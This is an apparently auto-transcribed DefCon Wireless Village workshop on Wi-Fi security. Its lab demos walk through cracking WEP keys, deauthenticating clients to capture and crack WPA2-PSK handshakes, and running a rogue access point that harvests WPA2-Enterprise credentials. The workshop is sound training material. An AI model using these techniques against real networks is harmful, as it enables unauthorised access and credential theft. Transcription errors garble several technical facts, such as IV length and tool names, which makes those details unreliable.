 Hello guys, welcome to the first-ever Virtual DefCon event. This workshop, Introduction to Wi-Fi Security, is a part of a wireless village, which is a part of DefCon as you know. So in this workshop, we are going to talk about the basics of Wi-Fi security. We will talk about the schemes that Wi-Fi uses to keep your traffic, your identity secure while you are using the Wi-Fi. And we will also look at the ways to attack those. My name is Nishant and I will be conducting this workshop along with my colleague Jaswin. We both work for Pentastore Academy. So before moving forward, a little bit background about us. I work as R&D Manager at Pentastore Academy. We work on developing labs and training contents for our customers. When we are not doing that, we train around the world in different venues. We present our research. Jaswin also works at Pentastore Academy. He is a researcher there. And apart from doing all the lab work and the routine work, he also helps me as a co-trainer in the trainings. And he also publishes his research. So here are some cool logos from some conferences that we have been to. This is the pentastoreacademy.com. We have a lot of courses on-demand video courses on here. You can go and take a look. Similarly, we have a browser-based lab, which is completely in cloud. We call it Attack Defense. Everything in this lab can be used using your browser. You don't need any VPN. You don't need any plug-in. We have customers from over 90-plus countries. And now coming to the workshop outline. So as discussed before, we will talk about the basics of Wi-Fi. And then we will talk about sniffing and recon. We'll talk about WEP, WPA2PSK, and WPA2Enterprise. What they are, how the authentication works in them, and how we can actually attack them. So first of all, when you will read about Wi-Fi, you will see that it is referred by the name or this number. That's 802.11. So 802 is the committee that deals with the network-related norms. And .11 is assigned to Wi-Fi or wireless LAN. So 802.11 is the standard. And then there are multiple amendments to the standard to support newer things. So for example, you have your 802.11, A, B, G, N, right? Similarly, you have I, W, and there's a list. There's a list of this. So all of these are amendments to the main standard. Wi-Fi Alliance is the organization that actually holds the right for this specific logo. The Wi-Fi trademarks actually belong to them. So if you are a vendor and if you want to use this logo on your product, you have to take approval from them. So you submit your product to them and then they go through it, they check if it comply with whatever standards they have, and then you're allowed to use this logo. So there are multiple amendments, but we are only going to talk about those which deal with the transmission of Wi-Fi. Especially the bands and the bandwidth and all. So in that, you have A, B, G, N, and AC, which is the latest one. So 802.11A, it uses OFDM. So all of this because it's a basic class, we don't have that amount of time. But just to give you an overview, there's a reason why these slides are here so that you can go back later and if you are interested in this specific part, you can dig deeper into it. So 11A is the first one. It was the basic one. It used to use 5 GHz and at that time OFDM was the way to propagate the wave of the data, in this case. And then the 11B came, it used to work on a different wave of modulation and 2.4 GHz was used for it. Then in G they increased the data carrying capacity. After that came N and actually allowed you to use two or more channels together. So what the idea here is to increase the throughput from A, B, G, N. What we are trying to do, we are trying to transmit more data using Wi-Fi. Because it's not like the older times now. If you talk about 10, 15 years back, you didn't have that kind of requirements as well as that kind of equipment at your home. So for example, you didn't have 4K TV. But now when you have 4K TV which connects to your internet and you want to stream a movie or something, you need higher bandwidth. So that's where all of these standards actually came in. So 11AC is the latest one which is being adopted by the market for the past few years now. So it can actually give you up to 1.3 Gbps of data transmission using your home Wi-Fi. And if you talk about enterprise Wi-Fi then the limit will increase. So these standards will make sure that it can accommodate your needs with the time. So this is the 2.4 GHz channel. So Wi-Fi, if you talk about the main Wi-Fi, not the newer ones like 11AD or something. It operates on two main channels. First one is the 2.4 GHz channel and the second one is the 5 GHz channel. So this is the layout for the channels on 2.4 GHz. So you can see that there are 14 channels and all of these cannot be used in all of geographies. There are regulations. So according to them you can use 14 channels in some of the geographies, some of the nations and then you can use 12 or 13 in others. So you can refer to the regulatory information for this. Now what you can observe here is these bands are very narrow and they overlap. And this causes a lot of problem because then you have interference when you have a lot of Wi-Fi networks operating and there are a lot of clients in the vicinity. It is going to cause problem. So that's where people then move to 5 GHz. So 5 GHz is more spread out. It has non-overlipping channels. So you can transmit more. So that was the idea behind it. Now coming back to the sniffing and the connection part, obviously if you want to connect to a Wi-Fi, everyone is doing it now. So it's the part of daily routine now. So you have your access point in your home at your office and then you have a Wi-Fi card which you have connected to your desktop externally or you can have a laptop which automatically comes with it, your phones, all of these have internal Wi-Fi cards. So also they have antennas. So using that, your device connects to the access point and then you are able to exchange traffic with it. So that's the basic thing about it. Now when in normal mode, these cards, they don't actually look at the traffic of other cards. So if you are sitting somewhere and there are multiple clients and multiple routers or access points, as you like to call them, if there are multiple of these pairs, they are transmitting data back and forth. But the card that your machine is using in normal operation, it will only consider or it will only show you the traffic that is for your machine. All the other, it totally rejects that, it totally knows that. So if you want to take a look at other people's traffic, it can't be done in the normal mode. So for that, you have something called as monitor mode. If you guys have done a sniffing of other people's machine on LAN, it's also known as promiscuous mode there. So monitor mode allows you to look at the traffic in the vicinity. So you can do sniffing and then you can go for attacks and all of those things. So first of the things that you need is a Wi-Fi card which allow you to sniff, which actually allow you to put it into monitor mode. So here are some of the cards which actually allows you to monitor mode. You can order one from Amazon or some other e-commerce market. So this was the old way of doing it, it was the conventional way of doing it. Now, suppose you're dealing with something advanced, right? You're dealing with 11 AC points, which is transmitting data on a very high pace. At that point, what you can do is you can go for an off-shelf access point. You can write with your own firmware and then you can use it for sniffing. The reason for doing that is for high-performance access points, your cards will not be able to match the throughput or the capacity of those access points. So if you have an access point, you have a better chance to not miss the traffic that is being transmitted or received by that specific access point. Now, because firmware is not something that is like Windows software, it's not like you download it and you click Run and it runs and installs, it's not like that. And that's where a lot of people face problems. So when you buy a router of the shelf routers from market and you want to transform it into sniffer, you can use something like OpenWRT. So OpenWRT is a Linux-based project for these embedded devices, which actually allow you to customize your routers and access points. You can use it in access point mode. You can make it something else. You can make it a hacking gadget. So all of that, it actually allows you. It has support for most of the hacking and recon tools, especially for Wi-Fi and all. So you can use it if you want to go for the higher throughput ones. So now let's talk about some basic terminology that will help us in the workshop for the later parts of the workshop. So first, Station or STA in short is nothing but a wireless client. It can be your mobile. It can be your laptop. It can be a desktop with a Wi-Fi card on it. Then comes BSS. BSS stands for Basic Service Set. So BSS, when you will hear about it, it is to refer a set of access point and a client, if they are operating in that, or it can be ad hoc clients, which do not need access point to connect. ESS is a set which contains multiple BSS. And similarly, then ESSID or SSID is the name which we use to identify that ESS. So suppose you have a Wi-Fi network, you put some name on it, home Wi-Fi or something. So that is SSID. It's important to remember. That's why I'm explaining it again. SSID is the name of the Wi-Fi network that you are using. And now, BSSID refers to the MAC address of the access point that is giving you the Wi-Fi. So BSSID will be the MAC address. And you will be able to see it when you connect with that Wi-Fi, not in your Windows machine directly. You have to do some dig through or you have to look at the packets to see it. Then comes the distribution system. So generally, distribution system refers to the network which connects access point with the larger network. So again, some examples of BSS. You can see that in the first picture here, you have a BSSID, this AP, you have this access point. And then there are two nodes which will be connected to this. Similarly, in ad hoc configuration, you can see that there is no access point, but these machines are connecting with each other. ESS consists of DS, which is connecting to access points, and then it consists of two BSS also, two or more actually, two in this figure. Now coming to WDS. WDS is a wireless distribution system. So suppose you want to deploy an access point in such a location where you don't have a wire, you don't have an Ethernet connectivity there. So what you can do is you can use an access point which has wire connectivity to extend the network. And this bridge or this link between these two access points is known as WDS link, and then you can cover more ground. So it's also known as mesh networking in Wi-Fi, if you read about it. So now there are three main type of packets in Wi-Fi. First is the management packet. Management packets are used to connect, to disconnect or to manage the devices, if you want to say on board. Similarly, control packets are something which deal with the transmission control and other thing, but that is not something that we are going to look into a lot. And the third one, data, as the name suggests, these are the packets which will actually carry the real data. And then you have different subtypes in these. You can read about these. This table is available on the internet. You can see that there are multiple management packets. You have a situation request, association, response. And similarly, you have weekends and probes and whatnot. So to summarize the Wi-Fi environment, you have an access point, which is currently operating a Wi-Fi network, which will be identified by its SSID. That's the Wi-Fi network name. And then BSSID will be there because the MAC address needs to be there on the access point. And this SSID will then send the beacons out. So beacons are the packets which your access point uses to advertise that, hey, I'm using, or I'm providing you the specific Wi-Fi that you can use. If a client has already connected to this Wi-Fi, instead of waiting for a beacons frame, it can also do probing. So by probing, it sends a probe message looking for that specific network, which it already connected to once or multiple times in the past. So once your client, it discovers the Wi-Fi network, then it goes ahead, it exchanges some packets with the access point, and then it connects with the access point. And after that, you can transmit data, or you can access internet and other things. So now, because it was not the wired thing, it's wireless. Your packets are open. Anyone with the monitor mode interfaces can capture it, and then you can look into what you are doing if it is not encrypted. So that's the reason why we needed Wi-Fi encryption standards so that we can protect our data from being sniffed by other people. At your home, it might not matter, but especially if you are at a coffee shop, if you are at your office, if you are at an airport, all of this matters. So here are some of the standards that we are going to talk about. We are going to talk about WEP, that was the older standard. I hope that no one is using it now, but still you will find it somewhere in a CTF or in someone's home who is not very tech savvy or old. WPA, WPA2 are the ones that are currently used. These can be used in two different configurations. WPA2, PSK or pre-shared key. It's also known as WPA or WPA2 personal, because it is meant to be personal use. And then there is enterprise one, which is meant for enterprise use. WPA3 is the latest standard. It is something that you will see in mainstream within a year or maybe this year. In some places you might have already been started seeing this. So now to do the recon and the cracking for WEP and WPA, PSK, we are going to use Aircraft NG suite of tools. So it's a set of tool which allows you to do different things. So Airdump NG and Airmon NG will allow you to capture the traffic, to monitor the waves, to see the devices, access points that are in the vicinity. Air Base NG and Air Replay NG allows you to create a honeypot to send the authentication messages, to replay the messages. And similarly if you want to crack the key or the passphrase for WEP or WPA, PSK, you use Aircraft NG. So you can know more about these by searching about these on Google. This tool is used a lot, so you'll find multiple videos on it. So now we'll talk about how to do basic recon with Airmon and Airdump. So now it's the demo time and for that we will shift to our demo setup. So this is the portal that we are going to use to learn about these attacks. The URL is blurred. As of now, don't worry about it. We'll post the link to it in the YouTube description part. So if you go down, you'll see that we have a course here which says Wi-Fi basics workshop. You press start on it. It will show you four different scenarios. First is the Wi-Fi basics and then you have attacking WEP, enterprise and PSK. So we are going to start the Wi-Fi basics one. So we chose this interface because as you can automatically see, you have commands on this side, you have lab on this side. So it will help you to learn because you are the beginner people so it really helps if you have guidelines ready. Instead of searching on it on a blog and then coming back and then pasting and making a mistake and going back, that actually wastes a lot of time. So what we will do now, we will select a server from here. In your case, you might only see one option, solve this recapture and then you start the lab. It will take some time in starting the lab so please be patient. So the lab is ready now. What we have to do is on the left-hand panel, we will read about the steps. So first is check Wi-Fi interfaces present on this system and then to fire this, we will use this button. Please use Firefox for this exercise. It might face some issues on Chrome and others. So if you click this, the command will execute and you will see that we have a WLAN 0 interface which is in managed mode. So as we discussed before, managed mode is good for normal operation but if you want to do the recon and the sniffing and other things, this won't be enough. So you have to put it in monitor mode and that's what we are doing in step 2. So this is the command to put it in the monitor mode. As you can observe, I, W, Dev, WLAN 0, the name of the interface and then set monitor none. So I'll press this and it seems that the command has run. Now let's again run this command to see if it is in monitor mode. Yes, it is. So we are ready now. So now what we will do, we will run AeroDumpNG on WLAN 0 and we will not define any other options for now. We will let it jump on all the channels of 2.4 GHz and find what it can. So press this and as you can observe here, now it is looking for different, different ESSIDs or SSIDs. You can also see the corresponding BSSIDs, corresponding channels and you can also see some of the stations which means these are laptops or these can be phones. In this case, this is emulated labs so obviously these are none. But in realistic scenario, you will see the phones, the laptops, other machines, sending probe requests, looking for these specific Wi-Fi. Right? So this is how you can check which devices are in the vicinity. So do a CTRL C to stop it and then let's move to the next screen here. Now suppose I am only interested in looking at traffic of channel 1. So in that case, I can fire this command and here with argument dash C, I have defined the channel number. So what you will see here is this time this channel will not jump and you will only see the traffic which is coming on this specific channel. So this is how you use AeroDump to do basic recon and with this, our lab is done. You can stop the lab after this and we'll get back to the slides. So now I will pass it over to my colleague, Jaswin, who will go through the WEP part and then I'll meet you guys again when we will discuss WPA2PSK and WPA2Enterprise. Hello everyone. Next we'll take a look at the wired equivalent privacy. When it comes to wired network, the physical proximity itself acts as a security mechanism. That is, we need to get into the building physically, find a port, plug in our device and sniff the traffic or perform an attack. Whereas in case of wireless networks, we have radio waves which are not going by walls. Therefore, it is very easy to intercept the traffic. WEP was the original IEEE standard to add security to wireless network. It provided security equivalent to that of wired network and hence the name. WEP used RC4 stream cipher for generating the key stream. It supported 40 bit shared key which is equivalent to 5 ASCII characters or 10 hexadecimal characters and a 104 bit shared key which is equivalent to 13 ASCII characters or 26 hex characters. Now if the same key is used to encrypt multiple plain text messages, what the attacker can do is analyze the ciphertext to the multipattern and the attacker can automatically find the key. To prevent this, an initialization vector is added to the key. In case of WEP, the initialization vector had length of 24 bit. Therefore, the encryption key had the length of 64 bit or 0.28 bit. WEP used CRC32 for generating the integrative chat value. Now let's take a look at the encryption process. So here we have the initialization vector, key and the message. The initialization vector and key is passed to the key schedule in algorithm and the pseudo random number generator. It generates the key stream which will be used to encrypt the data. For the second part, we have the message. The integrity chat value is generated of the message and is concatenated with the message and then it is encrypted. The integrity chat value is generated after decryption. We can verify that the message has not been tampered with. So finally, the message and the ICV is exorbitant with the key stream to generate the ciphertext. In the end, the packet has the initialization vector, 2-bit key ID, ciphertext and ICV. Now let's take a look at the decryption process. In the decryption process, we have an initialization vector, 2-bit key ID, ciphertext and ICV. We'll get the key from the key ID and we'll feed it to the key scheduling algorithm along with the initialization vector. This is for the pass to the pseudo random number generator and the key stream is generated which will be used to encrypt the ciphertext. The ciphertext is exoner with the key stream to generate the message and the ICV. Now the ICVs are compared and if both of them match, the packet is considered otherwise it is discarded. Now the next question arises what was the weakness of that? The major weakness in that was the length of the initialization vector. 2-bit was not enough and as a result when we have last number of packets the ID will get repeated and once the attacker has all of these ciphertexts with repeated IDs the attacker can easily find out the shared key. Now the attacker has two options one is to wait and sniff all the packet till we get enough number of IDs all the attacker can inject a packet to force the access point to send more packet and therefore the attacker will get more number of IDs and this way the second option will be to track any web key Now to track a 64-bit web key usually 250,000 IDs are required and to track a 128-bit web key 1.5 million IDs are required but with the techniques such as PWD it is possible to track web keys with a very less number of IDs. So to track web keys there are many methods of fake authentication capability attack fragmentation attack and PWD attack Now to track the web key we will start by sniffing the packet identify the SSID VSSID and the channel Now in order to send packets to the access point the MAC address of the attacker has to be authenticated with the access point otherwise any packet we send will get lost and will get to the authentication Now in order to authenticate the MAC address fake authentication can be used So what happens in fake authentication is we tell the access point that we can prove that we have the shared key but we will not send the shared key yet This way the access point will add the MAC address of the attacker in the list of clients who can send packets to the access point Now since we have not sent the shared key to the access point we cannot transmit data However we can capture the data from the legitimate client connected to the network and then replay those packets Now this is exactly what we are going to do First we will capture the ARP request sent to my already connected client and then we will replay it to the access point So when the access point gets the ARP request it will rebroadcast the ARP request with a new initialization vector This way we can continuously send ARP request to the access point to get more and more ARP request with new initialization vector Once we have enough number of initialization vector we can use air-crack-ng to track the web key So now let's take a look at them So we will quickly select the server and we will install the capture and then we will start the lab It should take couple of seconds for the lab to come up The lab is now ready Let's increase the size of the font We will start with the standard interfaces on the machine So we have to put the interfaces on SWLAN 1 Both are in managed mode So we will set WLAN 0 into monitor mode and we will check the list of interfaces again So now we can see WLAN 0 as in monitor Now let's check the networks which are present in the vicinity We can do this with the help of aero-dump-ng command So now as we can see we have epic media form which is using web on channel 6 So next what we will do is we will take the capture in our sets and write those packets into capture file Now it will just keep sniffing It could take a lot of time to get enough number of packets So what we are going to do is we will start and find a weekly attack in order to generate more number of packets So we will start and now we need around 10,000 data packets For current team 183,132 and the number increased So now we have 10,000 data packets We will stop the capture and we will also stop attacking the access point Now we will use aero-dump-ng command to track the data We will have to mention which network we want to target In this case we have epic media network which is having the index of 4 So enter 4 now and then we will start tracking So we were able to find the key The key was 14332 So guys, welcome back I hope you enjoyed the WEP session So now we will talk about WPA2 PSK This is the scheme that is widely used You will find this at your home and even in the smaller coffee shops or the restaurants or even the small offices So WPA2 came after WPA WPA was a transitional scheme to move from WEP to WPA2 So WPA2 uses dynamic keys unlike WEP It uses AES encryption standard with CCMP mode and the protocol is still secure It is prone to forcing or the dictionary attacks if your password is not strong But apart from that the scheme is still secure There were crack attacks discovered last year which was for this specific scheme But again, it is very important to understand that the problem was not in the scheme itself It was in the implementation So the scheme, theoretically if you choose a good password, it is good to go But WPA2 also had its own shortcomings It doesn't have forward secrecy which means if I am capturing all of your traffic today and if you are using WPA2 PSK even if I don't have the password today if I somehow manage to get the password two months after or two years after I can still go back and decrypt all of your traffic So that is not good from security point of view Similarly, there is no management frame protection So your receiver, when he receives a management frame he doesn't have any way to tell if it is coming from a real source or it is something which is sent by an attacker or a malicious user And that is the reason why the authentication attacks which are used widely for DOS, the denial of service work So you can read about the authentication attacks, it's very common now it's been used for quite some years now And also WPA2 PSK or personal is supposed to be personal It is supposed to be used in a personal network So if you use it in a work environment or somewhere which you will or some place which you don't count as a personal space it is also prone to insiders So if you have a malicious insider he can actually see the traffic of all the people on that specific Wi-Fi So as we mentioned before there are no static keys like WEP So idea is you generate a dynamic key you use that to decrypt the traffic or encrypt the traffic and then next time when you do this you again generate the keys again In saying it's very easy but you need some way in which both the parties can have the keys and then they can use them to encrypt and decrypt stuff and obviously this key needs to be the same because we are going to use the symmetric encryption it's a lot of data So what we do in this case is we use something called PSK that's where the PSK terms come it's pre-shared key So you have a passphrase which is between 8 to 63 letters long or characters long and you use it you feed it to PBKDF2 PBKDF2 is a function it stands for password based key derivation function and it will actually give you a pre-shared key or 256 bit The reason of doing this is passphrases are easier for human beings just like you have IP to domain mappings similarly you can use passphrase to generate the pre-shared key it's easier to remember something meaningful than a chunk of random hex characters So when your access point is configured it already knows the passphrase when you connect to that network you also know the passphrase and that's how it works So both the parties they can calculate the same PSK and then they can use it for connection But again as you can observe PSK is not transient or not temporary in nature it's not dynamically generated you are converting it from the passphrase to the PSK but that's not dynamic nature it will remain same till the time you will not change the password So that's where we have to generate which we refer to BTK from this So PMK is derived using this specific function here you use PBKDF you pass it the secret passphrase you pass it the SSID name and then the SSID name length and then these numbers are there which is 4096 it's the number of iteration that will happen and then 256 is the intended key length the PMK key that we are going to get So you can read more about BTKDF and all of this in RFC 2 at minute So what will happen in WPA2 or even in WPA we had this handshake we call it 4-way handshake and this handshake is used to generate this specific you know temporary key that you use to pass the traffic on securely obviously So when you were client it wants to connect to the access point first of all it will locate the access point it will locate the Wifi network and after that there are authentication and association messages which are part of Wifi protocol but here please don't confuse authentication with the thing that we are going to do now So it's more of compatibility kind of thing rather than security the steps are pretty much the same you are client it will ask the AP that hey I want to connect and your AP will say ok go ahead So this much is done after this both of them have pre-shared key why because both of them had pass phrases and when you have pass phrases you can derive PSK of 256 bit from it we just saw it in the previous slides Now your access point will send message 1 there are 4 messages that is why it is 4 way handshake so in first message it will generate a random number or a random string it will call it anons and it will send it in a packet in plain text to the supplicant supplicant here is the client your mobile laptop you know whatever it is now what your client will do it will take these anons also generate a random number or random string called anons so a here denotes to the authenticator or the access point s here denotes to the supplicant or this station so when you have anons and anons which are randomly generated you can use this specific function here to generate the PTK PTK is the pair wise transient key and as you can observe here we passed tmk to it tmk is nothing but a key that we derived using the passphrase and SSID and SSID name and then you have anons and anons these are randomly generated by access point and the client and then you have access point mac and the client mac so this is the information which is now used to generate temporary key this is temporary because anons and anons are randomly generated so now this happens so this guy can generate a PTK now what it will do it will send anons plus mic mic or michael is used to verify the integrity of a message and it is signed by a key so in this case the key that we have used to generate it is used to sign this message and again anons and sons are in plain text so it will be sent to the access point now access point has all the information so it will also generate PTK so what it will do it will generate its PTK it will check this mic and then it will generate mic for this specific packet and match the mic to mic now if this mic matches that means the PTK is same with the both parties in that case access point will go ahead install the key for use and it will also send a message to the client that you know this key is good please go ahead with it and then client will also say ok I have installed the key and now we can use this key for encrypting the traffic and then the encryption starts now access point if it does not have the same PMK the passphrase is different for access point and the client then the PTK will be different because you know it depends on PMK right then the mic check will fail and in that case access point will reject it and it will not connect so this is how the authentication works in WPA 4-way handshake you get it, you had the passphrase you use PBKDF you put it, you gave it SSID name, length and you generated a pre-shared key that is 256-bit in length and then from 4-way handshake you get all of this information you get SNONS, ANONS because again these are transmitted in plain text there is no encryption and then APMAC and ClientMAC is something that you can easily see from there you will generate the PTK you will use the PTK to encrypt the traffic so now from an attacker's angle if you want to perform an attack a dictionary attack to guess the PTK how you will do it? you will take a dictionary you will take one passphrase from dictionary at a one time and you will generate the PTK because obviously you also need to have this information that comes from 4-way handshake once you have this you can generate the PTK you have a packet from the real access point on client which has MIC you will generate the MAC you will generate the MIC and then you will compare the MIC if MIC is correct then you have done it you have got the right passphrase for it so this is how the dictionary attack will work now look at the information what we need so all packets will have AP and client MAC because one is sender one is receiver A nonce is going in packet 1 and packet 3 and S nonce is going in packet 2 so now what you can do here is you can either take all 4 packets or you can either take packet 1 or 2 and you will have all the information that you need to crack WPA to PSK and again the authentication we already talked about it it's a packet that you send you spoof it you send it to client from posing as access point if you are sending it to access point you will pose as one of the clients and then you will tell the other party that I don't want to be connected to you anymore so in that case the other party will think that this message is being sent by the real party and it will disconnect so this comes handy when you have access point connected with the client and you want this to move so that you can capture the 4 way handshake because remember 4 way handshake will only take place when you are connecting to the device first time when you are connecting to the access point only then your client will do the 4 way handshake if it's already connected to the 4 way handshake so if we want to capture 4 way handshake for a device which is already connected we have to do a authentication so now it's the demo time we will do this using the same lab the principles are very simple WPA PSK is using a week pass phrase which is present in our dictionary we will capture the 4 way handshake and then we will attack it so let's move to the lab so let's go to attacking WPA to PSK again you have to select a zone from here prove to this guy that you are not a robot you are a human and then start the lab and wait and the lab is ready we will follow the same drill first let's check the Wi-Fi interface there is a Wi-Fi interface in managed mode and it's name is WLAN 0 we will put it in monitor mode let's check if it is there yes it is in monitor mode now let's run aero dump on WLAN 0 and here we can observe that this is the SSID protected network which is using WPA to PSK so let's press control C and move to the next step SSID protected network is the one that we want to do the attack on so for that what we want to do is we need to capture the 4 way handshake so it is running on channel 4 so what we will do we will run aero dump packet capture on channel 4 using this command and as you can observe it is now doing that if you wait for some time it will also find the client that is attached to this specific machine if you are not able to see it don't worry we will do a broadcast the authentication on this SSID and then also it will work but as you can observe here aero dump has found one client that is this client connected to this VSSID now if you remember to capture the 4 way handshake we need to disconnect it and for that we are going to use the authentication packet and so we can launch it from the next step open a new tab you can use the same WLAN 0 interface to do this because you have set WLAN 0 on channel 4 and you want to send this packet on channel 4 as well so click on this and you will see that air replay NG is sending the authentication packets 100 packets to this specific BSSID let's do control C because I think these are enough and let's go back here and now what happened when we did this is this guy here it was disconnected and then it reconnected once we stopped the authentication attack and when it did that we captured handshake for it so now we have handshake you can also run commands on it if you like to so you can observe that we have the file, the capture file here we also have this specific dictionary here which we will use to crack it so now we can go ahead and try to crack it we will use air crack NG with this dictionary and test-01.cap is the capture file so run it attack is running and we have found the right key so the right passphrase is raspberry so with that this demo is done this is how easy it is to attack it if you are using a weak passphrase so after WPA2 PSK now we will talk about WPA2 Enterprise we already learned about the shortcomings of WPA2 personal these are not really shortcomings but it was designed in such way it was designed for personal purposes so it was assumed that whoever is using the network you don't need to hide your information from them so that's the reason why same password was there and all the other people on the network had the capability to decrypt your traffic but if you want to use this for your enterprise or for your company this is going to be a problem because first thing is this insider and the second thing is it is difficult to maintain the credentials because everyone is using the same passphrase now suppose if this passphrase gets leaked you have to change it you have to inform everybody and you have to keep doing this again and again so for that these people they came up with WPA2 Enterprise so in WPA2 Enterprise instead of using a passphrase a radius server is used for authentication so this radius server will maintain the credential list for all authorized users and then users can use their username passwords to authenticate with the Wi-Fi so it looks like this so you have your Wi-Fi client that is a laptop or a PC and then you have the access point which is connected to the radius server so this radius server is the authentication back end here and then this is the handshake flow so 4-way handshake will be there because again it is WPA but in this case because there is no passphrase EAP will be used so EAP is extended authentication protocol so EAP will be used to do authentication with the authentication server that is the radius server in the back end so your client after doing the connection ritual it will send an EAP pool start which is the first packet and then access point will ask it for its identity so if you are using credentials the username will be the identity and this username will be then forwarded to the authentication server so after this the access point will be in the path but it is not really doing anything your client and the authentication server will exchange some packets and once it is proved to the authentication server that this guy or this client is the real client it will generate a PMK it is randomly generated and then it will send this PMK to the access point and to the client so you can observe the difference from the PSK here it is not being generated from the passphrase that was known to both parties and after you have PMK on both the parties you will do the same 4-way handshake and then data transfer will continue now the scheme that we are going to talk about in this demo is a PEEP MSChap V2 so PEEP stands for Protected Extensible Authentication Protocol it is known as protected or it is being referred as protected because all the EAP packets that will be exchanged between your client and your authentication server will go through a TLS tunnel so even access point cannot look into it right, what it is sending and then MSChap MS obviously stands for Microsoft and then CHAP is Challenge Handshake Authentication Protocol so it is a challenge response authentication protocol where one party will send a challenge and then the other party will send response and then they will verify each other so it is like that so the user account credentials, the password and the username will be used a TLS certificate will be used to create the tunnel and to make sure that the client is connecting to the correct authentication server so this is how it looks so till here you can see that the client's identity is asked by the radio server or the access point and then the username is provided after that it requests for the PEEP the radio server is initiating PEEP and then a TLS tunnel will be set up so this certificate will be sent by the authentication server to the client and the client if it accepts it after that it will do the MSChap challenge so the challenge will be sent by the your client is supposed to provide a response and send it to the radio server the radio server will check it if it is good then PEEP success will be conveyed and the PMK will be shared with the station and on the same time it will also share the PMK with the access point because PTK is the key that will be generated by the station and the access point so radius has nothing to do there but if you want to attack it what are the ways so what you can do is instead of making the client connect to the real access point you can create your own honeypot or fake access point and when the client will connect to it obviously because you don't have access to the real radio server because if you had that you could have taken credentials from there you don't have that you can relate a fake radio server which will say yes to all the credentials and then here you are relying on the client that it will provide the real credentials but before that there is a problem with PEEP because there is a TLS tunnel and because the certificate that your fake access point or fake radius will send it will not match the real certificate so your client will actually get a warning that the certificate doesn't match or we don't know this certificate so at that point if your client or if your user he accepts this fake certificate a non-real certificate then you are in a problem if you don't do this then you are again safe so you can say that this attack is a combination of technical as well as structural engineering angles so we are going to do this attack but to keep it simple what we will do instead of creating an event we will create a honeypot so you don't have to do the d-auth and all those things so for that we are going to use hostivity mana toolkit so it's a tool which can be used to create the rogue access point it is generally used mainly for the enterprise networks because it will keep the hassle of creating a radius and all away from you you can directly go, you can fire 3-4 commands and you are good to go you are good to do attack so let's go for the demo now so here go for the attacking WPA2 enterprise same drill you have to select the server you have to prove that you are a human and you might have to solve this a recapture so now the lab is ready so let's see what interfaces are there on the lab so here we can observe that there are two interfaces WLAN0 and WLAN1 let's put WLAN0 into monitor mode and let's run your dump on it so what we can observe here is there is a client which is looking for amaze underscore LLC right? so if we go to next step we will see that the challenges regarding this only a client is probing for amaze underscore LLC we have to create a honeypot and then we have to steal the credential for it and this guy is using peepmschap v2 so let's do a control C here we will also need fake certificates as we talked about before and there you go we have provided you all the things that you need for this if you scroll down you will also see the configuration for the host APD mana so what you have to do here is first you have to create this file so I am using VIM VIM is mostly available in most environments so we can use that and let's copy this and paste it here and you have to format it you have to make sure that everything is in separate lines let me do that so now I have done the formatting for this file let's go over the configuration file so first is the interface we are using WLAN1 SSID is mentioned we want to host a honeypot with amaze underscore LLC you can choose channel as per your liking I have chosen 6 here hardware mode is G which indicates the 11G and then WPA3 means the WPA2 and here we are using TKIP here you can put CCMP you can put something else so yeah there is a mistake when you put TKIP CCMP which means you support both WPA and WPA2PSK and then for 1X, 1X is the EAP and you are also hosting a fake backend server for that we will provide special configuration in this file which can be then used by our host APD mana and here you can observe the certificate, the key all of that is provided so that when the tunnel forms this setup can get the information and then show us what it is mana EAP success actually signifies that doesn't matter the kind of credentials the user provides we will always tell him that these are the correct ones so this file is done let's create the second file let's move a little and copy it from here paste it so to know more details about these configurations I will suggest you visit host APD mana's github page the link to the documentation is also given here so check that out you will be able to understand this better so this configuration will make sure that doesn't matter what kind of scheme or what kind of method your EAP is using it will support it even if it is a PEEP or a TTLS or TLS or even if it is using MSJAP or GTC or something inside so all of that will be supported so once it is done we can move forward and we can launch this to start our honeypot so what we can observe here is on interface WLAN 1 we have created amaze underscore LLC SSID here what we are observing is a client which was roaming has tried to connect to this you know access point and in that process we are able to see the information that it was passing so if you remember we talked about CHAP right the challenge response so here host APD mana is actually giving us the challenge the response so that we can crack it and the username here is shawm so this is the command with a sleep to crack it so if we move down we have actually written this command for you let's clear the screen a little bit and let's run this command so what we did here is because we had the challenge and the response captured we used a dictionary file that is given here and from that we recovered the password for it the password is chocolate in this case so this is how using a honeypot you can attack enterprise networks the wpa2 enterprise in this case which was using a peep ms chap2 version 2 the attack will work similarly for the other schemes as well so with this we are going to conclude this workshop I hope you learned about the basics of wifi and the schemes and how to attack them and if you face these in real world or in a CTF somewhere you will be able to solve it so with that thanks again for attending our workshop in wireless village we also thanks wireless village and the defcon team to make all of this possible in this stops in time doesn't matter how bad it is the learning should continue and with that I will say thanks if you have any follow up questions any comments any feedbacks here is my email id you can drop me a mail and I will try to help you out thank you